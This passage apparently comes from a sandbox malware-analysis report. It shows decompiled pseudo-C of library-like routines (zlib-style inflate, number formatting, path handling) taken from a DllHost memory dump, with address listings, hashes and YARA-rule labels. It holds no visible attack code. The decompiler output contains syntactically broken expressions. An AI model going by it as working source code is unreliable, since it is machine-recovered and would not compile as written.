				r11d = r11d - _t200;
				_t236 = _t131 & 0x000000ff;
				r9d = r9d >> 0x10;
				if ((_t236 & 0x00000010) == 0) goto 0x191d0277;
				_t237 = _t236 & 0x0000000f;
				if (r11d - _t237 >= 0) goto 0x191d02e2;
				r11d = r11d + 8;
				_t315 =  &(_t314[1]);
				if (r11d - _t237 >= 0) goto 0x191d02e2;
				_t174 = ((_t167 >> _t190) + (( *_t313 & 0x000000ff) << r11d) + ((_t313[1] & 0x000000ff) << __r11 + 8) >> _t196 >> _t200) + (( *_t314 & 0x000000ff) << r11d) + (( *_t315 & 0x000000ff) << r11d);
				_t316 =  &(_t315[1]);
				r11d = r11d + 8;
				_t203 = _t237;
				r11d = r11d - _t237;
				if (1 - r8d - _v88 <= 0) goto 0x191d0464;
				if (1 - _a32 <= 0) goto 0x191d031e;
				if ( *((intOrPtr*)(_t351 + 0x1be0)) != 0) goto 0x191d0528;
				if (r14d != 0) goto 0x191d0358;
				r9d = _a16;
				r9d = r9d - 1;
				_t335 = _t334 + _t352;
				_t270 = 1 - r10d;
				if (_t270 >= 0) goto 0x191d03eb;
				r10d = r10d - 1;
				 *_t323 =  *_t335 & 0x000000ff;
				_t324 = _t323 + 1;
				if (_t270 != 0) goto 0x191d0340;
				goto 0x191d03e3;
				if (r14d - 1 >= 0) goto 0x191d03b5;
				r9d = _a16;
				r9d = r9d + r14d - 1;
				_t272 = 1 - r10d;
				if (_t272 >= 0) goto 0x191d03eb;
				r10d = r10d - 1;
				 *_t324 =  *( &(( &(_t335[1]))[_t352]) - _t324 + _t324) & 0x000000ff;
				_t325 = _t324 + 1;
				if (_t272 != 0) goto 0x191d0380;
				_t339 = _t352;
				_t273 = r14d - r10d;
				if (_t273 >= 0) goto 0x191d03eb;
				r10d = r10d - r14d;
				_t142 =  *_t339 & 0x000000ff;
				 *_t325 = _t142;
				_t326 =  &(_t325[0]);
				_t210 = r14d + 0xffffffff;
				if (_t273 != 0) goto 0x191d03a0;
				goto 0x191d03e3;
				r9d = _t142;
				_t274 = _t210 - r10d;
				if (_t274 >= 0) goto 0x191d03eb;
				r10d = r10d - _t210;
				asm("o16 nop [eax+eax]");
				 *_t326 = ( &(_t339[1]))[_t352] & 0x000000ff;
				_t327 =  &(_t326[0]);
				if (_t274 != 0) goto 0x191d03d0;
				_t344 = _t327 - _t286;
				_t275 = r10d - 2;
				if (_t275 <= 0) goto 0x191d043a;
				asm("o16 nop [eax+eax]");
				r10d = r10d + 0xfffffffd;
				 *_t327 =  *_t344 & 0x000000ff;
				_t327[0] = _t344[1] & 0x000000ff;
				_t345 =  &(_t344[3]);
				_t327[0] = _t344[2] & 0x000000ff;
				_t328 =  &(_t327[0]);
				if (_t275 != 0) goto 0x191d0410;
				if (r10d == 0) goto 0x191d04c1;
				 *_t328 =  *_t345 & 0x000000ff;
				_t329 =  &(_t328[0]);
				if (r10d - 1 <= 0) goto 0x191d04c6;
				 *_t329 = _t345[1] & 0x000000ff;
				_t330 =  &(_t329[0]);
				goto 0x191d04c6;
				_t297 = _t330 - _t286;
				_t298 =  &(_t297[3]);
				 *_t330 =  *_t297 & 0x000000ff;
				r10d = r10d + 0xfffffffd;
				_t330[0] =  *(_t298 - 2) & 0x000000ff;
				_t330[0] =  *(_t298 - 1) & 0x000000ff;
				_t331 =  &(_t330[0]);
				if (r10d - 2 > 0) goto 0x191d0470;
				if (r10d == 0) goto 0x191d04c1;
				 *_t331 =  *_t298 & 0x000000ff;
				_t332 =  &(_t331[0]);
				if (r10d - 1 <= 0) goto 0x191d04cb;
				 *_t332 =  *(_t298 + 1) & 0x000000ff;
				_t333 =  &(_t332[0]);
				goto 0x191d04cb;
				if (_t316 - _v96 >= 0) goto 0x191d0545;
				if (_t333 - _v104 >= 0) goto 0x191d0545;
				goto 0x191d0164;
				if (( *_t320 & 0x00000020) == 0) goto 0x191d04f6;
				 *((intOrPtr*)(_t351 + 8)) = 0x3f3f;
				goto 0x191d0552;
				 *((long long*)(_a8 + 0x20)) = "invalid literal/length code";
				 *((intOrPtr*)(_t351 + 8)) = 0x3f51;
				goto 0x191d0552;
				 *((long long*)(_a8 + 0x20)) = "invalid distance code";
				 *((intOrPtr*)(_t351 + 8)) = 0x3f51;
				goto 0x191d0552;
				_t289 = "invalid distance too far back";
				 *((long long*)(_a8 + 0x20)) = _t289;
				 *((intOrPtr*)(_t351 + 8)) = 0x3f51;
				goto 0x191d054d;
				_t304 = _a8;
				 *(_t304 + 0x10) = _t333;
				 *((intOrPtr*)(_t304 + 0x18)) = ((0x00000001 << _t203) - 0x00000001 & _t174) + r9d - r8d + 0x101;
				 *_t304 = _t316 - _t289;
				_t159 = _t298 * 8;
				r11d = r11d - _t159;
				_t161 = _t159 - __esi + 5;
				 *((intOrPtr*)(_t304 + 8)) = _t161;
				 *(_t351 + 0x4c) = r11d;
				 *(_t351 + 0x48) = (0x00000001 << r11d) - 0x00000001 & _t174 >> _t203;
				return _t161;
			}






































































                                                                                                                                                              0x7ff7191d00c0
                                                                                                                                                              0x7ff7191d00d1
                                                                                                                                                              0x7ff7191d00d5
                                                                                                                                                              0x7ff7191d00e1
                                                                                                                                                              0x7ff7191d00e8
                                                                                                                                                              0x7ff7191d00ee
                                                                                                                                                              0x7ff7191d00f1
                                                                                                                                                              0x7ff7191d00f7
                                                                                                                                                              0x7ff7191d00fb
                                                                                                                                                              0x7ff7191d0110
                                                                                                                                                              0x7ff7191d0114
                                                                                                                                                              0x7ff7191d0118
                                                                                                                                                              0x7ff7191d0122
                                                                                                                                                              0x7ff7191d0125
                                                                                                                                                              0x7ff7191d012e
                                                                                                                                                              0x7ff7191d0139
                                                                                                                                                              0x7ff7191d0140
                                                                                                                                                              0x7ff7191d0155
                                                                                                                                                              0x7ff7191d015a
                                                                                                                                                              0x7ff7191d0161
                                                                                                                                                              0x7ff7191d0168
                                                                                                                                                              0x7ff7191d0180
                                                                                                                                                              0x7ff7191d0184
                                                                                                                                                              0x7ff7191d018c
                                                                                                                                                              0x7ff7191d018f
                                                                                                                                                              0x7ff7191d0198
                                                                                                                                                              0x7ff7191d019d
                                                                                                                                                              0x7ff7191d01a0
                                                                                                                                                              0x7ff7191d01a5
                                                                                                                                                              0x7ff7191d01a7
                                                                                                                                                              0x7ff7191d01aa
                                                                                                                                                              0x7ff7191d01b3
                                                                                                                                                              0x7ff7191d01b8
                                                                                                                                                              0x7ff7191d01cd
                                                                                                                                                              0x7ff7191d01d6
                                                                                                                                                              0x7ff7191d01d9
                                                                                                                                                              0x7ff7191d01de
                                                                                                                                                              0x7ff7191d01e1
                                                                                                                                                              0x7ff7191d01e8
                                                                                                                                                              0x7ff7191d01ea
                                                                                                                                                              0x7ff7191d01ef
                                                                                                                                                              0x7ff7191d01f2
                                                                                                                                                              0x7ff7191d01f5
                                                                                                                                                              0x7ff7191d01fa
                                                                                                                                                              0x7ff7191d01fd
                                                                                                                                                              0x7ff7191d0202
                                                                                                                                                              0x7ff7191d020c
                                                                                                                                                              0x7ff7191d020f
                                                                                                                                                              0x7ff7191d0211
                                                                                                                                                              0x7ff7191d0215
                                                                                                                                                              0x7ff7191d0221
                                                                                                                                                              0x7ff7191d0224
                                                                                                                                                              0x7ff7191d022b
                                                                                                                                                              0x7ff7191d0243
                                                                                                                                                              0x7ff7191d0247
                                                                                                                                                              0x7ff7191d0257
                                                                                                                                                              0x7ff7191d0260
                                                                                                                                                              0x7ff7191d0263
                                                                                                                                                              0x7ff7191d0268
                                                                                                                                                              0x7ff7191d026b
                                                                                                                                                              0x7ff7191d026e
                                                                                                                                                              0x7ff7191d0275
                                                                                                                                                              0x7ff7191d027a
                                                                                                                                                              0x7ff7191d0294
                                                                                                                                                              0x7ff7191d029c
                                                                                                                                                              0x7ff7191d029f
                                                                                                                                                              0x7ff7191d02a4
                                                                                                                                                              0x7ff7191d02a7
                                                                                                                                                              0x7ff7191d02aa
                                                                                                                                                              0x7ff7191d02b1
                                                                                                                                                              0x7ff7191d02b3
                                                                                                                                                              0x7ff7191d02b9
                                                                                                                                                              0x7ff7191d02c3
                                                                                                                                                              0x7ff7191d02c9
                                                                                                                                                              0x7ff7191d02cf
                                                                                                                                                              0x7ff7191d02d9
                                                                                                                                                              0x7ff7191d02db
                                                                                                                                                              0x7ff7191d02de
                                                                                                                                                              0x7ff7191d02e2
                                                                                                                                                              0x7ff7191d02f3
                                                                                                                                                              0x7ff7191d02fd
                                                                                                                                                              0x7ff7191d030e
                                                                                                                                                              0x7ff7191d0318
                                                                                                                                                              0x7ff7191d0321
                                                                                                                                                              0x7ff7191d0323
                                                                                                                                                              0x7ff7191d032b
                                                                                                                                                              0x7ff7191d032e
                                                                                                                                                              0x7ff7191d0331
                                                                                                                                                              0x7ff7191d0334
                                                                                                                                                              0x7ff7191d033a
                                                                                                                                                              0x7ff7191d0348
                                                                                                                                                              0x7ff7191d034b
                                                                                                                                                              0x7ff7191d0351
                                                                                                                                                              0x7ff7191d0353
                                                                                                                                                              0x7ff7191d0360
                                                                                                                                                              0x7ff7191d0362
                                                                                                                                                              0x7ff7191d036d
                                                                                                                                                              0x7ff7191d0373
                                                                                                                                                              0x7ff7191d0376
                                                                                                                                                              0x7ff7191d0378
                                                                                                                                                              0x7ff7191d0385
                                                                                                                                                              0x7ff7191d0388
                                                                                                                                                              0x7ff7191d038e
                                                                                                                                                              0x7ff7191d0390
                                                                                                                                                              0x7ff7191d0393
                                                                                                                                                              0x7ff7191d0396
                                                                                                                                                              0x7ff7191d039b
                                                                                                                                                              0x7ff7191d03a0
                                                                                                                                                              0x7ff7191d03a8
                                                                                                                                                              0x7ff7191d03ab
                                                                                                                                                              0x7ff7191d03ae
                                                                                                                                                              0x7ff7191d03b1
                                                                                                                                                              0x7ff7191d03b3
                                                                                                                                                              0x7ff7191d03b5
                                                                                                                                                              0x7ff7191d03bb
                                                                                                                                                              0x7ff7191d03be
                                                                                                                                                              0x7ff7191d03c0
                                                                                                                                                              0x7ff7191d03c7
                                                                                                                                                              0x7ff7191d03d8
                                                                                                                                                              0x7ff7191d03db
                                                                                                                                                              0x7ff7191d03e1
                                                                                                                                                              0x7ff7191d03e8
                                                                                                                                                              0x7ff7191d03eb
                                                                                                                                                              0x7ff7191d03ef
                                                                                                                                                              0x7ff7191d0405
                                                                                                                                                              0x7ff7191d0414
                                                                                                                                                              0x7ff7191d0418
                                                                                                                                                              0x7ff7191d0420
                                                                                                                                                              0x7ff7191d0429
                                                                                                                                                              0x7ff7191d042d
                                                                                                                                                              0x7ff7191d0431
                                                                                                                                                              0x7ff7191d0438
                                                                                                                                                              0x7ff7191d043d
                                                                                                                                                              0x7ff7191d044c
                                                                                                                                                              0x7ff7191d044f
                                                                                                                                                              0x7ff7191d0455
                                                                                                                                                              0x7ff7191d045c
                                                                                                                                                              0x7ff7191d045f
                                                                                                                                                              0x7ff7191d0462
                                                                                                                                                              0x7ff7191d0469
                                                                                                                                                              0x7ff7191d0473
                                                                                                                                                              0x7ff7191d0477
                                                                                                                                                              0x7ff7191d047a
                                                                                                                                                              0x7ff7191d0482
                                                                                                                                                              0x7ff7191d048a
                                                                                                                                                              0x7ff7191d048e
                                                                                                                                                              0x7ff7191d0496
                                                                                                                                                              0x7ff7191d049b
                                                                                                                                                              0x7ff7191d04aa
                                                                                                                                                              0x7ff7191d04ad
                                                                                                                                                              0x7ff7191d04b3
                                                                                                                                                              0x7ff7191d04b9
                                                                                                                                                              0x7ff7191d04bc
                                                                                                                                                              0x7ff7191d04bf
                                                                                                                                                              0x7ff7191d04d0
                                                                                                                                                              0x7ff7191d04d5
                                                                                                                                                              0x7ff7191d04da
                                                                                                                                                              0x7ff7191d04ea
                                                                                                                                                              0x7ff7191d04ec
                                                                                                                                                              0x7ff7191d04f4
                                                                                                                                                              0x7ff7191d04fd
                                                                                                                                                              0x7ff7191d0501
                                                                                                                                                              0x7ff7191d0509
                                                                                                                                                              0x7ff7191d051a
                                                                                                                                                              0x7ff7191d051e
                                                                                                                                                              0x7ff7191d0526
                                                                                                                                                              0x7ff7191d0530
                                                                                                                                                              0x7ff7191d0537
                                                                                                                                                              0x7ff7191d053b
                                                                                                                                                              0x7ff7191d0543
                                                                                                                                                              0x7ff7191d0545
                                                                                                                                                              0x7ff7191d0555
                                                                                                                                                              0x7ff7191d056a
                                                                                                                                                              0x7ff7191d056d
                                                                                                                                                              0x7ff7191d0570
                                                                                                                                                              0x7ff7191d0577
                                                                                                                                                              0x7ff7191d0586
                                                                                                                                                              0x7ff7191d0589
                                                                                                                                                              0x7ff7191d0590
                                                                                                                                                              0x7ff7191d0594
                                                                                                                                                              0x7ff7191d05a8

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                                                                                                                              • API String ID: 0-3255898291
                                                                                                                                                              • Opcode ID: 0ee40d5a11c99ce6a8ab4ea31bbf665b8c1bdf3809f52e897708819de6c816c0
                                                                                                                                                              • Instruction ID: b0c5a626fb31edfa61d0eef1ae961fd5a233acf82c2ebb1b1429276afdb85db1
                                                                                                                                                              • Opcode Fuzzy Hash: 0ee40d5a11c99ce6a8ab4ea31bbf665b8c1bdf3809f52e897708819de6c816c0
                                                                                                                                                              • Instruction Fuzzy Hash: C0D16A32A0C9C18BE7599F28E44867D7BF1E7953A4F448235EA9A437C1CA3CD98ED710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E902C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 248COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E00007FF77FF7191E902C(intOrPtr* __rax, long long __rbx, unsigned int* __rcx, signed int* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, signed long long _a72) {
				void* _v40;
				intOrPtr _v48;
				intOrPtr _v64;
				intOrPtr _v72;
				long long _v88;
				intOrPtr _v96;
				signed int _v104;
				intOrPtr _v112;
				long long _v120;
				void* _t68;
				signed int _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t114;
				void* _t128;
				intOrPtr* _t144;
				char* _t148;
				unsigned long long _t164;
				signed int* _t178;
				signed int* _t179;
				signed int* _t186;
				signed int* _t189;
				char* _t190;
				signed int* _t191;
				void* _t194;
				void* _t195;
				signed long long _t200;
				signed long long _t204;
				signed long long _t207;
				void* _t210;
				signed int* _t214;
				signed int* _t215;
				void* _t219;
				void* _t221;
				void* _t225;
				signed int* _t227;
				signed int* _t228;
				signed int* _t229;
				signed int* _t234;
				void* _t236;
				long long _t241;
				unsigned int* _t244;
				void* _t246;
				signed int* _t247;
				signed int* _t248;

				_t144 = __rax;
				_t236 = _t221;
				 *((long long*)(_t236 + 8)) = __rbx;
				 *((long long*)(_t236 + 0x10)) = __rbp;
				 *((long long*)(_t236 + 0x18)) = __rsi;
				_push(_t210);
				_push(_t241);
				r13d = 0;
				 *__rdx = r13b;
				_t178 = __rdx;
				_t244 = __rcx;
				_t200 = _a72;
				_t219 = __r9;
				_t111 =  >=  ? _a48 : r13d;
				E00007FF77FF7191D86F4(__rax, __rdx, _t236 - 0x48, _t200, __r8, _t246);
				_t7 = _t210 + 0xb; // 0xb
				if (__r8 - _t7 > 0) goto 0x191e909a;
				E00007FF77FF7191DC854(_t144);
				_t8 = _t241 + 0x22; // 0x22
				_t112 = _t8;
				 *_t144 = _t112;
				E00007FF77FF7191DA5D8();
				goto 0x191e9366;
				if (( *__rcx >> 0x00000034 & _t200) != _t200) goto 0x191e9127;
				_v88 = _t241;
				_t225 = __r8;
				_v96 = _a64;
				_t148 = _a40;
				_v104 = r13b;
				_v112 = _t112;
				_v120 = _t148;
				_t68 = E00007FF77FF7191E939C(_t178, __rcx, _t178, __r8, __r8, __r10);
				_t113 = _t68;
				if (_t68 == 0) goto 0x191e90f6;
				 *_t178 = r13b;
				goto 0x191e9366;
				_t186 = _t178;
				E00007FF77FF7191F6F7C(_t68, 0x65, _t148, _t186);
				if (_t148 == 0) goto 0x191e9363;
				 *_t148 = ((_a56 ^ 0x00000001) << 5) + 0x50;
				 *(_t148 + 3) = r13b;
				goto 0x191e9363;
				if (_t186 >= 0) goto 0x191e9139;
				 *_t178 = 0x2d;
				_t179 =  &(_t178[0]);
				_t247 =  &(_t179[0]);
				r12d = (_a56 ^ 0x00000001) & 0x000000ff;
				r10d = 0x30;
				if ((0x00000000 &  *_t244) != 0) goto 0x191e918e;
				 *_t179 = r10b;
				asm("dec eax");
				goto 0x191e9191;
				 *_t179 = 0x31;
				_t214 =  &(_t247[0]);
				if (_t113 != 0) goto 0x191e919e;
				goto 0x191e91af;
				_t74 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xf8))))));
				 *_t247 = _t74;
				if (( *_t244 & 0xffffffff) <= 0) goto 0x191e9248;
				r8d = r10w & 0xffffffff;
				if (_t113 <= 0) goto 0x191e91fb;
				_t75 = _t74 + r10w;
				_t128 = _t75 - 0x39;
				if (_t128 <= 0) goto 0x191e91e9;
				_t76 = _t75 + (r12d << 5) + 7;
				 *_t214 = _t76;
				_t114 = _t113 - 1;
				_t215 =  &(_t214[0]);
				r8w = r8w + 0xfffc;
				if (_t128 >= 0) goto 0x191e91c9;
				if (r8w < 0) goto 0x191e9248;
				if (_t76 - 8 <= 0) goto 0x191e9248;
				_t189 = _t215 - 1;
				r8b =  *_t189;
				if ((_t225 - 0x00000046 & 0x000000df) != 0) goto 0x191e922d;
				 *_t189 = r10b;
				_t190 = _t189 - 1;
				goto 0x191e921a;
				if (_t190 == _t247) goto 0x191e9245;
				if (r8b != 0x39) goto 0x191e923d;
				goto 0x191e9241;
				 *_t190 = _t225 + 1;
				goto 0x191e9248;
				 *((char*)(_t190 - 1)) =  *((char*)(_t190 - 1)) + 1;
				if (_t114 <= 0) goto 0x191e9265;
				r8d = _t114;
				_t191 = _t215;
				_t78 = E00007FF77FF7191D4A30(_t225 - 0x46, r10b, _t191, _t178, _t225);
				r10d = 0x30;
				_t248 =  !=  ? _t215 + _t179 : _t247;
				r12b = r12b << 5;
				r12b = r12b + 0x50;
				 *_t248 = r12b;
				_t234 =  &(_t248[0]);
				_t164 =  *_t244 >> 0x34;
				if ( *_t247 - r13b >= 0) goto 0x191e9297;
				_t194 = _t219 - _t164;
				_t35 = _t164 + 2; // 0x2d
				_t81 =  <  ? _t35 : 0x2b;
				_t248[0] =  <  ? _t35 : 0x2b;
				 *_t234 = r10b;
				if (_t194 - 0x3e8 < 0) goto 0x191e92e8;
				_t227 =  &(_t234[0]);
				_t204 = (_t191 - _t219 >> 7) + (_t191 - _t219 >> 7 >> 0x3f);
				 *_t234 = __r10 + _t204;
				_t195 = _t194 + _t204 * 0xfffffc18;
				if (_t227 != _t234) goto 0x191e92f3;
				if (_t195 - 0x64 < 0) goto 0x191e9322;
				_t207 = (_t204 + _t195 >> 6) + (_t204 + _t195 >> 6 >> 0x3f);
				 *_t227 = __r10 + _t207;
				_t228 =  &(_t227[0]);
				if (_t228 != _t234) goto 0x191e932d;
				if (_t195 + _t207 * 0xffffff9c - 0xa < 0) goto 0x191e9359;
				 *_t228 = __r10 + (_t207 >> 2) + (_t207 >> 2 >> 0x3f);
				_t229 =  &(_t228[0]);
				 *_t229 = (_t78 & 0x000007ff) + r10b;
				_t229[0] = r13b;
				if (_v48 == r13b) goto 0x191e9379;
				 *(_v72 + 0x3a8) =  *(_v72 + 0x3a8) & 0xfffffffd;
				return r13d;
			}




















































                                                                                                                                                              0x7ff7191e902c
                                                                                                                                                              0x7ff7191e902c
                                                                                                                                                              0x7ff7191e902f
                                                                                                                                                              0x7ff7191e9033
                                                                                                                                                              0x7ff7191e9037
                                                                                                                                                              0x7ff7191e903b
                                                                                                                                                              0x7ff7191e903e
                                                                                                                                                              0x7ff7191e904f
                                                                                                                                                              0x7ff7191e9054
                                                                                                                                                              0x7ff7191e9057
                                                                                                                                                              0x7ff7191e905a
                                                                                                                                                              0x7ff7191e905d
                                                                                                                                                              0x7ff7191e906c
                                                                                                                                                              0x7ff7191e906f
                                                                                                                                                              0x7ff7191e9075
                                                                                                                                                              0x7ff7191e907a
                                                                                                                                                              0x7ff7191e9083
                                                                                                                                                              0x7ff7191e9085
                                                                                                                                                              0x7ff7191e908a
                                                                                                                                                              0x7ff7191e908a
                                                                                                                                                              0x7ff7191e908e
                                                                                                                                                              0x7ff7191e9090
                                                                                                                                                              0x7ff7191e9095
                                                                                                                                                              0x7ff7191e90af
                                                                                                                                                              0x7ff7191e90bb
                                                                                                                                                              0x7ff7191e90c0
                                                                                                                                                              0x7ff7191e90c3
                                                                                                                                                              0x7ff7191e90ca
                                                                                                                                                              0x7ff7191e90d5
                                                                                                                                                              0x7ff7191e90da
                                                                                                                                                              0x7ff7191e90de
                                                                                                                                                              0x7ff7191e90e3
                                                                                                                                                              0x7ff7191e90e8
                                                                                                                                                              0x7ff7191e90ec
                                                                                                                                                              0x7ff7191e90ee
                                                                                                                                                              0x7ff7191e90f1
                                                                                                                                                              0x7ff7191e90fb
                                                                                                                                                              0x7ff7191e90fe
                                                                                                                                                              0x7ff7191e9106
                                                                                                                                                              0x7ff7191e911c
                                                                                                                                                              0x7ff7191e911e
                                                                                                                                                              0x7ff7191e9122
                                                                                                                                                              0x7ff7191e912f
                                                                                                                                                              0x7ff7191e9131
                                                                                                                                                              0x7ff7191e9133
                                                                                                                                                              0x7ff7191e9140
                                                                                                                                                              0x7ff7191e914b
                                                                                                                                                              0x7ff7191e914f
                                                                                                                                                              0x7ff7191e9175
                                                                                                                                                              0x7ff7191e9177
                                                                                                                                                              0x7ff7191e9183
                                                                                                                                                              0x7ff7191e918c
                                                                                                                                                              0x7ff7191e918e
                                                                                                                                                              0x7ff7191e9191
                                                                                                                                                              0x7ff7191e9197
                                                                                                                                                              0x7ff7191e919c
                                                                                                                                                              0x7ff7191e91ad
                                                                                                                                                              0x7ff7191e91af
                                                                                                                                                              0x7ff7191e91b5
                                                                                                                                                              0x7ff7191e91bb
                                                                                                                                                              0x7ff7191e91cb
                                                                                                                                                              0x7ff7191e91dc
                                                                                                                                                              0x7ff7191e91e0
                                                                                                                                                              0x7ff7191e91e4
                                                                                                                                                              0x7ff7191e91e6
                                                                                                                                                              0x7ff7191e91e9
                                                                                                                                                              0x7ff7191e91eb
                                                                                                                                                              0x7ff7191e91ed
                                                                                                                                                              0x7ff7191e91f4
                                                                                                                                                              0x7ff7191e91f9
                                                                                                                                                              0x7ff7191e91ff
                                                                                                                                                              0x7ff7191e9214
                                                                                                                                                              0x7ff7191e9216
                                                                                                                                                              0x7ff7191e921a
                                                                                                                                                              0x7ff7191e9223
                                                                                                                                                              0x7ff7191e9225
                                                                                                                                                              0x7ff7191e9228
                                                                                                                                                              0x7ff7191e922b
                                                                                                                                                              0x7ff7191e9230
                                                                                                                                                              0x7ff7191e9236
                                                                                                                                                              0x7ff7191e923b
                                                                                                                                                              0x7ff7191e9241
                                                                                                                                                              0x7ff7191e9243
                                                                                                                                                              0x7ff7191e9245
                                                                                                                                                              0x7ff7191e924a
                                                                                                                                                              0x7ff7191e924c
                                                                                                                                                              0x7ff7191e9252
                                                                                                                                                              0x7ff7191e9257
                                                                                                                                                              0x7ff7191e925f
                                                                                                                                                              0x7ff7191e9268
                                                                                                                                                              0x7ff7191e926c
                                                                                                                                                              0x7ff7191e9270
                                                                                                                                                              0x7ff7191e9274
                                                                                                                                                              0x7ff7191e9277
                                                                                                                                                              0x7ff7191e927e
                                                                                                                                                              0x7ff7191e928f
                                                                                                                                                              0x7ff7191e9294
                                                                                                                                                              0x7ff7191e92a2
                                                                                                                                                              0x7ff7191e92a5
                                                                                                                                                              0x7ff7191e92a8
                                                                                                                                                              0x7ff7191e92ac
                                                                                                                                                              0x7ff7191e92b6
                                                                                                                                                              0x7ff7191e92c2
                                                                                                                                                              0x7ff7191e92d4
                                                                                                                                                              0x7ff7191e92db
                                                                                                                                                              0x7ff7191e92e5
                                                                                                                                                              0x7ff7191e92eb
                                                                                                                                                              0x7ff7191e92f1
                                                                                                                                                              0x7ff7191e930e
                                                                                                                                                              0x7ff7191e9315
                                                                                                                                                              0x7ff7191e9318
                                                                                                                                                              0x7ff7191e9325
                                                                                                                                                              0x7ff7191e932b
                                                                                                                                                              0x7ff7191e934c
                                                                                                                                                              0x7ff7191e934f
                                                                                                                                                              0x7ff7191e935c
                                                                                                                                                              0x7ff7191e935f
                                                                                                                                                              0x7ff7191e936b
                                                                                                                                                              0x7ff7191e9372
                                                                                                                                                              0x7ff7191e9398

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                              • API String ID: 3215553584-1523873471
                                                                                                                                                              • Opcode ID: 5b807a447c6b0405498819a91f1ea05c9821dcd4817e281c139e41d21d098e7a
                                                                                                                                                              • Instruction ID: 5258da8819fdd948922f0732bffa9c294ab1b06fd7af1983507f37fdbc8a0a9d
                                                                                                                                                              • Opcode Fuzzy Hash: 5b807a447c6b0405498819a91f1ea05c9821dcd4817e281c139e41d21d098e7a
                                                                                                                                                              • Instruction Fuzzy Hash: 19914672B09BC687FF16EF25A4043BDB7A6AB50BA8F458031CA4D57381DA3DE54B9310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EDA08 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                              			E00007FF77FF7191EDA08(void* __ecx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rsi;
				void* __rbp;
				void* _t36;
				intOrPtr _t67;
				signed long long _t70;
				long long _t72;
				long long _t74;
				long long _t80;
				void* _t85;
				void* _t92;
				long long _t106;
				long long _t110;
				signed long long _t112;
				signed long long _t113;
				void* _t118;
				intOrPtr _t130;
				void* _t132;
				void* _t133;
				signed long long _t136;
				intOrPtr* _t137;
				intOrPtr* _t142;

				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x191eda44;
				E00007FF77FF7191DC854(__rax);
				_t3 = _t110 + 0x16; // 0x16
				 *__rax = _t3;
				E00007FF77FF7191DA5D8();
				goto 0x191edbe4;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = _t110;
				_t67 =  *__rcx;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t110;
				if (_t67 == 0) goto 0x191edab1;
				_a24 = 0x3f2a;
				_a26 = dil;
				E00007FF77FF7191F52C0();
				if (_t67 != 0) goto 0x191eda89;
				r8d = 0;
				_t36 = E00007FF77FF7191EDC14(__rcx,  *__rcx,  &_a24, _t112, _t118,  &_v88);
				goto 0x191eda95;
				0x191edd9c();
				if (_t36 != 0) goto 0x191edaa4;
				goto 0x191eda56;
				goto 0x191edba9;
				_t142 = _v88;
				_t130 = _v80;
				_a24 = _t110;
				_t70 = _t130 - _t142;
				_t136 = (_t70 >> 3) + 1;
				_t92 =  >  ? _t110 : _t70 + 7 >> 3;
				_t113 = _t112 | 0xffffffff;
				if (_t92 == 0) goto 0x191edb13;
				_t72 = _t113 + 1;
				if ( *((intOrPtr*)( *_t142 + _t72)) != dil) goto 0x191edaf4;
				if (_t110 + 1 != _t92) goto 0x191edaee;
				_a24 = _t110 + 1 + _t72;
				r8d = 1;
				E00007FF77FF7191E1EFC(_t36, _t136, _t110 + 1 + _t72, _t110 + 1);
				_t80 = _t72;
